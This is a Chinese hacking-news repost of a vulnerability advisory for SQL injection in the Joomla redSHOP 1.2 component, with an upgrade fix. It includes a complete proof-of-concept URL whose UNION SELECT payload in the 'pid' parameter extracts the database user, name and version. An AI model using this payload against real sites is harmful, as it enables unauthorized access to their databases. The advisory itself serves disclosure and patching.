记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Joomla组件 redSHOP 1.2 SQL注射

2013-08-13 15:05

--------------------------------------------
Joomla! redSHOP component v1.2 SQL Injection
--------------------------------------------
 
== 概述 ==
- 影响产品: Joomla! redSHOP component
- 下载地址: http://redcomponent.com/redcomponent/redshop
- 开发者: redcomponent
- 影响版本: 1.2有效,其他版本可能也会有效
- 漏洞发现者: Matias Fontanini
 
== 缺陷 ==
When using the "addtocompare" task, the component does not correctly
sanitize the "pid" parameter before using it to construct SQL queries,
making it vulnerable to SQL Injection attacks.
 
The following proof of concept request retrieves the database user,
name and version:
 
http://www.hackdig.com /index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422
 
== 解决方案 ==
升级到1.3版本

 

知识来源: www.2cto.com/Article/201308/235767.html

阅读:68099 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“Joomla组件 redSHOP 1.2 SQL注射”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云